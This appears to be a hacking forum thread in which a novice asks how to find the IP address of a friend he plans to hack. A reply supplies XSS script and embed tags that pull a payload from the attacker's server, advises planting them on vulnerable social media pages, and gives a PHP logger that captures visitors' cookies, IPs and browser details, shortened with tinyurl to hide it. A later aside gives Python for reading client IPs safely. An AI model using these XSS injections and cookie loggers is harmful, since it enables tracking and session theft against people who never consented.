
Target Specific Hack


Posiix


Hi guys,

I posted a few questions a while ago and have since installed Linux with rEFIt (dual boot) on my MBP and purchased Gray Hat Hacking.

I had a general question. I've convinced my buddy to allow me to target his computer; he owes me a 6-pack if I gain admin access to his system... but I don't want to use any of the convenient means of locating his IP that I have at my disposal... I want to assume I know only his name.

Of course names lead to addresses, which lead to wireless networks and WEP hacks... and/or I could devise a scheme to get him to email me...

What other approaches to obtaining the IP of a specific target are there? I've read a lot (in Hacking for Dummies and Gray Hat Hacking) about gaining entrance through ports, and hacking hashes... but as far as getting IP addresses, it seems the approaches are not usually target-specific, but rather a more general scan-and-see-what-turns-up process. For my purposes getting the IP is the first step!

Links to sources are great if they save you time in responding! Thanks a mill guys!

BG


On your server host an image, 1x1 pixel, and either through XSS or some other means have him load that image. Look in your logs and there is his IP.

Write a simple script to FTP-upload a file containing his IP. How you make that file is another matter.

Instant Message him... Lots of ways to get this method to work, send file...

Does he host anything on his computer, i.e. a personal home page? Ping hispage.com.

List goes on and on...


Thanks for the response... with respect to the server and the XSS, are you talking about having him connect to a personal home page of mine hosted by a server I run locally? And what might that XSS code look like (I need to learn simple XSS, yah?) For that matter, I read a lot about having a server, and I can't figure out why it is so important! Is this sort of thing why?

And as for the FTP, are you talking about trying to exploit his FTP if he has one (he doesn't)? Or is this again linked into the server approach above?

I'm really interested in your response, would you mind elaborating?

Cheers,

BG

Link to comment
Share on other sites

Not going into detail, but here are some starter points. For the XSS there are multiple methods. Yes, you will need your own server; it doesn't matter where it's hosted.

<script SRC=http://yourpage.com/xss.js></SCRIPT>

In xss.js load the image, or just replace that script with the location of the image.

<EMBED SRC="yourpage.com/xss.swf" AllowScriptAccess="always"></EMBED>

This is a good one because you can get MySpace to load it; that way when he visits the MySpace page you can grab the IP.

XSS is easy but it takes some social engineering. I suggest you start here and move up.

The FTP trick is getting the guy to download and run a file, a lot harder than the XSS, because you can use tinyurl to mask your XSS attack. Windows has a built-in FTP upload command and that is why I say use FTP, but any way you can make it work, do it. You can also just use a connect-back trojan for this as well, but then you are giving him your IP, not very stealthy.


Thanks for the link bro, I'll ensure that I read into it; before you I'd not heard of XSS at all! Cheers.

At risk of really exposing myself as a newb here, I had (only) a few more questions.

1. How does all of this fit together generally?

For instance, do I reserve some domain, pay for small hosting on a server somewhere, host the XSS script there, then set up a MySpace page which loads the XSS as an image, then check the log on my host to retrieve the data I'm looking for? Is that how all these elements are linked together?

2. You mentioned MySpace; which other sites are open to this vulnerability? Are there ways of working this through Facebook inboxes or chats?

3. You mentioned a 1x1 pixel image. .swf is Flash, yeh... but .js is what? Is that XSS mimicking a JPG?

Thanks man.. really appreciate it.

P|x


I can tell you don't know what you are doing, so I'm going to just spell it out.

The Setup:

Windows XP Box with internet access

Apache

PHP

Tinyurl.com

Method 1:

Create a page, index.php, and add this code:

<?php
// Logs details of whoever requests this page to log.txt.
// Only REMOTE_ADDR is the address the server actually connected with;
// the Client-IP and X-Forwarded-For headers are sent by the client and
// may be absent or forged, so every field is read with a fallback to
// avoid undefined-index notices when a header is missing.
$useragent    = $_SERVER['HTTP_USER_AGENT'] ?? '';
$cookie       = $_GET['cookie'] ?? '';
$httpreferrer = $_SERVER['HTTP_REFERER'] ?? '';
$HttpClientIP = $_SERVER['HTTP_CLIENT_IP'] ?? '';
$RemAddr      = $_SERVER['REMOTE_ADDR'] ?? '';
$CacheControl = $_SERVER['HTTP_CACHE_CONTROL'] ?? '';
$XForward     = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';
$querystring  = $_SERVER['QUERY_STRING'] ?? '';

$filename = 'log.txt';
$somecontent = "User Agent: $useragent\n Cookie: $cookie\n HTTP Referrer: $httpreferrer\n HTTP Client IP: $HttpClientIP\n Remote Address: $RemAddr\n Cache Control: $CacheControl\n X Forward: $XForward\n Query String: $querystring\n";

// is_writable() is false if log.txt does not exist yet, so create an
// empty log.txt (writable by the web server user) before the first hit.
if (is_writable($filename)) {

    // Append so earlier visits are kept.
    if (!$handle = fopen($filename, 'a')) {
        echo "Cannot open file ($filename)";
        exit;
    }

    if (fwrite($handle, $somecontent) === FALSE) {
        echo "Cannot write to file ($filename)";
        exit;
    }

    echo "Success, wrote ($somecontent) to file ($filename)";

    fclose($handle);

} else {
    echo "The file $filename is not writable";
}
?>

Shorten the URL at tinyurl.com and send it to him; that will log all the info you need to log.txt in the same directory.

Method 2:

Find a site vulnerable to an XSS attack.

The .js is just an obfuscation technique; you can insert whatever you want, as long as the mark downloads it you are able to log that IP address.

Set up an Apache/PHP server locally. You can go out and find a free service, but if it's your friend and he knows you're doing it, then why bother?

Open GIMP/Photoshop and create a 1x1 pixel illustration and save it.

Host that on your server.

Add the location of the pixel to the XSS.

Monitor your host's log file and watch who downloads it.

Most of this has to do with social engineering, because you are sending them a link in the hope they will open it. The second method works with emails as well if they choose to view images. As for working this through Facebook, yes you can. There are sites out there dedicated to logging XSS vulns found; just find a fresh one and do this... easy as pie. Even with his IP I doubt you can do anything; if you have no clue as to how to find it, what are you going to do when you do have it? Metasploit is good for picking up some older vulnerabilities and fusking with them, but what if all he is running on his computer is a browser? What are you going to do then? "Hacking" isn't a point-and-click type ordeal.
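
A note on the fields the script above writes out, as an added example that is not part of any post in this thread: of the three "IP" values it logs, only REMOTE_ADDR is the TCP peer the web server actually talked to. HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are plain request headers that any client can set to anything, so a log that treats them as the visitor's address can be filled with whatever the visitor chooses. The Python below (added here, not code from the thread) derives a client address from the same CGI/WSGI-style environment the PHP reads, trusting X-Forwarded-For only when the request arrived via a proxy in an allowlist; the proxy address 10.0.0.5 and the sample requests are constructed for the example.

```python
import ipaddress

# Assumption for this example: the only reverse proxy in front of the
# server is 10.0.0.5. Only its X-Forwarded-For header is worth reading.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def parse_ip(value):
    """Return an ip_address for value, or None if it is not a valid address."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


def client_ip(environ, trusted_proxies=TRUSTED_PROXIES):
    """Return (address, source) for a CGI/WSGI-style environ dict.

    REMOTE_ADDR is the socket peer and is authoritative. X-Forwarded-For
    is honoured only when that peer is a trusted proxy, and then the chain
    is walked from the right (the hop nearest us) towards the left; the
    left-most entries are whatever the original client chose to send.
    HTTP_CLIENT_IP is never used: nothing vouches for it.
    """
    peer = parse_ip(environ.get("REMOTE_ADDR", ""))
    if peer is None:
        return None, "invalid"
    if peer not in trusted_proxies:
        # Direct connection: headers are the client's own claims, ignore them.
        return peer, "REMOTE_ADDR"
    xff = environ.get("HTTP_X_FORWARDED_FOR", "")
    hops = [parse_ip(h) for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if hop is None:
            break  # malformed entry: stop trusting the rest of the chain
        if hop not in trusted_proxies:
            return hop, "X-Forwarded-For"
    # Proxy sent no usable chain; fall back to the peer itself.
    return peer, "REMOTE_ADDR"


def log_line(environ):
    """Same information as the PHP script, with the untrusted values labelled."""
    address, source = client_ip(environ)
    return (
        f"Client IP: {address} (from {source}) | "
        f"Untrusted X-Forwarded-For: {environ.get('HTTP_X_FORWARDED_FOR', '')!r} | "
        f"Untrusted Client-IP: {environ.get('HTTP_CLIENT_IP', '')!r} | "
        f"User Agent: {environ.get('HTTP_USER_AGENT', '')!r}"
    )


# Constructed sample requests (documentation address ranges, not real hosts).
DIRECT_WITH_FORGED_HEADERS = {
    "REMOTE_ADDR": "203.0.113.7",
    "HTTP_X_FORWARDED_FOR": "1.2.3.4",
    "HTTP_CLIENT_IP": "5.6.7.8",
    "HTTP_USER_AGENT": "Mozilla/5.0 (constructed)",
}
VIA_TRUSTED_PROXY = {
    "REMOTE_ADDR": "10.0.0.5",
    "HTTP_X_FORWARDED_FOR": "1.2.3.4, 198.51.100.9",
    "HTTP_USER_AGENT": "Mozilla/5.0 (constructed)",
}
VIA_PROXY_GARBAGE_CHAIN = {
    "REMOTE_ADDR": "10.0.0.5",
    "HTTP_X_FORWARDED_FOR": "not-an-address",
}

if __name__ == "__main__":
    for env in (DIRECT_WITH_FORGED_HEADERS, VIA_TRUSTED_PROXY, VIA_PROXY_GARBAGE_CHAIN):
        print(log_line(env))
```

The first sample shows the point: the request connected directly from 203.0.113.7 yet carries X-Forwarded-For and Client-IP headers naming other addresses, and the function reports 203.0.113.7 while keeping the forged values only as labelled untrusted data. Behind the trusted proxy the right-most non-proxy hop (198.51.100.9) is used, not the client-chosen 1.2.3.4 at the left end.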


D,

Thanks again. I completely understand that hacking is not a simple point-and-click affair. I have no intention of being a script kiddie; it's just that at this point my knowledge is limited and I find it hard at times to see the big picture of how all the various elements of the "craft" (network security) fit together. That's all I was trying to get at with the above questioning; I'm not asking for specific instructions. But in order to approach the problem creatively I need a sense of the whole picture; learning the specifics will come second.

I don't plan to be able to make this happen for some time, I assure you. Thanks for opening my eyes a little more.

Cheers.

P
